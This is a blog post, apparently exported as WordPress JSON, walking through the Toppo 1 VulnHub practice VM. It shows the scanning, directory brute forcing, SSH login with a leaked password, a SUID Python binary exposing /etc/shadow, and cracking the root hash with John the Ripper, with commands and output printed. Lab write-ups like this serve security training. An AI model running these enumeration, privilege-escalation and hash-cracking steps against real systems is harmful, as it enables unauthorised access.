{"id":266,"date":"2018-07-17T19:50:48","date_gmt":"2018-07-18T00:50:48","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=266"},"modified":"2019-08-28T10:31:18","modified_gmt":"2019-08-28T14:31:18","slug":"toppo-walkthrough","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/toppo-walkthrough\/","title":{"rendered":"Toppo 1 Walkthrough"},"content":{"rendered":"

This is a walkthrough of the Toppo 1 vulnerable VM. You can find it on VulnHub here: https:\/\/www.vulnhub.com\/entry\/toppo-1,245\/<\/a><\/p>\n

Scanning<\/h1>\n

First, I’ll start by finding the VM’s IP address:<\/p>\n

root ~ # netdiscover -i eth1 -r 10.10.1.0\/24\n\n Currently scanning: 10.10.1.0\/24   |   Screen View: Unique Hosts                                                                                            \n                                                                                                                                                             \n 3 Captured ARP Req\/Rep packets, from 3 hosts.   Total size: 180                                                                                             \n __________________________________________________________________________\n   IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \n --------------------------------------------------------------------------\n 10.10.1.1       0a:00:27:00:00:02      1      60  Unknown vendor                                                                                            \n 10.10.1.10      08:00:27:18:25:ee      1      60  PCS Systemtechnik GmbH                                                                                    \n 10.10.1.100     08:00:27:36:07:36      1      60  PCS Systemtechnik GmbH<\/pre>\n

Now for some portscanning with nmap:<\/p>\n
root ~ # nmap -sV -O 10.10.1.10\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2018-07-17 19:54 EDT\nNmap scan report for 10.10.1.10\nHost is up (0.00027s latency).\nNot shown: 997 closed ports\nPORT    STATE SERVICE VERSION\n22\/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)\n80\/tcp  open  http    Apache httpd 2.4.10 ((Debian))\n111\/tcp open  rpcbind 2-4 (RPC #100000)\nMAC Address: 08:00:27:18:25:EE (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/pre>\n

Enumeration<\/h1>\n
The interesting items here are that SSH & Apache are running. First, I’ll check out the website:<\/p>\n
\"\"<\/p>\n
I poked around the site for a bit and spidered the thing with Burp Suite but didn’t find anything terribly interesting. I decided to use Gobuster<\/a> for directory brute forcing along with the “raft” wordlist I obtained from Daniel Miessler’s SecLists<\/a> (FYI, RAFT is a discontinued web app proxy but it’s wordlists are a spidering of the Internet’s robot.txt files. So a bunch of directories people don’t want you to see):<\/p>\n
root ~ # gobuster -q -u http:\/\/10.10.1.10\/ -w \/usr\/share\/wordlists\/Web-Content\/raft-large-directories.txt -o gobuster.txt\n\/js (Status: 301)\n\/admin (Status: 301)\n\/css (Status: 301)\n\/img (Status: 301)\n\/mail (Status: 301)\n\/manual (Status: 301)\n\/vendor (Status: 301)\n\/LICENSE (Status: 200)<\/pre>\n

Of course, the most interesting result here is \/admin:<\/p>\n
\"\"<\/p>\n
Hmm…<\/p>\n
root ~ # curl 10.10.1.10\/admin\/notes.txt\nNote to myself :\n\nI need to change my password :\/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .<\/pre>\n

Exploitation?<\/h1>\n
That was easy \ud83d\ude42 Let’s try to SSH in and take a stab at a username:<\/p>\n
root ~ # ssh ted@10.10.1.10\nThe authenticity of host '10.10.1.10 (10.10.1.10)' can't be established.\nECDSA key fingerprint is SHA256:+i9tqbQwK978CB+XRr02pS6QPd3evJ+lueOkK1LTtU0.\nAre you sure you want to continue connecting (yes\/no)? yes\nWarning: Permanently added '10.10.1.10' (ECDSA) to the list of known hosts.\nted@10.10.1.10's password: \n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Tue Jul 17 19:17:24 2018 from 10.10.1.2\nted@Toppo:~$ id\nuid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)\nted@Toppo:~$<\/pre>\n

Privilege Escalation<\/h1>\n
I do believe that is the fastest I’ve ever gotten shell access to a machine. Anyway, next I’ll start poking around for privilege escalation. I like to use a couple of different enumeration scripts to check for potential paths for privescs. This time I’ll start with linuxprivchecker.py<\/a>. So I’ll execute this after SCPing it over to the VM. There’s a LOT of output so I’ll spare you the entirety of it. As I scrolled through, one section caught my interest:<\/p>\n
[+] Shadow File (Privileged)\n    root:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ\/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS\/bYsXmBjI0:17636:0:99999:7:::\n    daemon:*:17636:0:99999:7:::\n    bin:*:17636:0:99999:7:::\n    sys:*:17636:0:99999:7:::\n    sync:*:17636:0:99999:7:::\n    games:*:17636:0:99999:7:::\n    man:*:17636:0:99999:7:::\n    lp:*:17636:0:99999:7:::\n    mail:*:17636:0:99999:7:::\n    news:*:17636:0:99999:7:::\n    uucp:*:17636:0:99999:7:::\n    proxy:*:17636:0:99999:7:::\n    www-data:*:17636:0:99999:7:::\n    backup:*:17636:0:99999:7:::\n    list:*:17636:0:99999:7:::\n    irc:*:17636:0:99999:7:::\n    gnats:*:17636:0:99999:7:::\n    nobody:*:17636:0:99999:7:::\n    systemd-timesync:*:17636:0:99999:7:::\n    systemd-network:*:17636:0:99999:7:::\n    systemd-resolve:*:17636:0:99999:7:::\n    systemd-bus-proxy:*:17636:0:99999:7:::\n    Debian-exim:!:17636:0:99999:7:::\n    messagebus:*:17636:0:99999:7:::\n    statd:*:17636:0:99999:7:::\n    avahi-autoipd:*:17636:0:99999:7:::\n    sshd:*:17636:0:99999:7:::\n    ted:$6$U2\/Cun.m$A2eC7LBIW6D0eM1BPJWz6rSAGcnmfR\/OC4MkPmEIZbuANEaCuNK1KPedXRhkMZbxkek7NX0lfqFVWl.tyN.lL0:17636:0:99999:7:::<\/pre>\n

That’s odd. Is the shadow file world readable?<\/p>\n
ted@Toppo:~$ cat \/etc\/shadow\ncat: \/etc\/shadow: Permission denied<\/pre>\n

Nope. So how did the script output the contents? Let me just check another file permission:<\/p>\n
ted@Toppo:~$ ls -l \/usr\/bin\/python2.7 \n-rwsrwxrwx 1 root root 3889608 Aug 13  2016 \/usr\/bin\/python2.7<\/pre>\n

And there we have it. A way in. Or rather, a way up. Python has the SUID permission bit set, meaning that program will run with the owner’s (root) permissions & not the user running the program. A grave security oversight, if I do say so myself. At first, I tried just spawning a TTY from Python:<\/p>\n
ted@Toppo:~$ python2.7 -c 'import pty; pty.spawn(\"\/bin\/bash\")'\nbash-4.3$ whoami\nted<\/pre>\n

Drats. Ok, well I haven’t used a password cracker in a while and I do have the hash of root’s password. I saved that first line from \/etc\/shadow to a file on my Kali machine called shadow.txt. I also saved the first line of \/etc\/passwd (root’s entry) to a file called passwd.txt. I’ll run unshadow on those and try to crack the password with John the Ripper’s default password list.<\/p>\n
root ~\/Toppo # unshadow passwd.txt shadow.txt > unshadow.txt\nroot ~\/Toppo # cat unshadow.txt \nroot:$6$5UK1sFDk$sf3zXJZ3pwGbvxaQ\/1zjaT0iyvw36oltl8DhjTq9Bym0uf2UHdDdRU4KTzCkqqsmdS2cFz.MIgHS\/bYsXmBjI0:0:0:root:\/root:\/bin\/bash\nroot ~\/Toppo # john unshadow.txt \nWarning: detected hash type \"sha512crypt\", but the string is also recognized as \"crypt\"\nUse the \"--format=crypt\" option to force loading these as that type instead\nUsing default input encoding: UTF-8\nLoaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128\/128 SSE2 2x])\nPress 'q' or Ctrl-C to abort, almost any other key for status\ntest123          (root)\n1g 0:00:00:05 DONE 2\/3 (2018-07-17 19:45) 0.1838g\/s 198.3p\/s 198.3c\/s 198.3C\/s lacrosse..franklin\nUse the \"--show\" option to display all of the cracked passwords reliably\nSession completed<\/pre>\n

That was a lot faster than I expected. Let’s try it out:<\/p>\n
ted@Toppo:~$ su -\nPassword: \nroot@Toppo:~# ls\nflag.txt\nroot@Toppo:~# cat flag.txt \n_________                                  \n|  _   _  |                                 \n|_\/ | | \\_|.--.   _ .--.   _ .--.    .--.   \n    | |  \/ .'`\\ \\[ '\/'`\\ \\[ '\/'`\\ \\\/ .'`\\ \\ \n   _| |_ | \\__. | | \\__\/ | | \\__\/ || \\__. | \n  |_____| '.__.'  | ;.__\/  | ;.__\/  '.__.'  \n                 [__|     [__|              \n\n\n\n\nCongratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}<\/pre>\n
Great success!<\/p>\n","protected":false},"excerpt":{"rendered":"
This is a walkthrough of the Toppo 1 vulnerable VM. You can find it on VulnHub here: https:\/\/www.vulnhub.com\/entry\/toppo-1,245\/ Scanning First, I’ll start by finding the VM’s IP address: root ~Continue readingToppo 1 Walkthrough<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-266","post","type-post","status-publish","format-standard","hentry","category-vulnhub"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/266","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=266"}],"version-history":[{"count":9,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/266\/revisions"}],"predecessor-version":[{"id":282,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/266\/revisions\/282"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=266"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=266"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=266"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}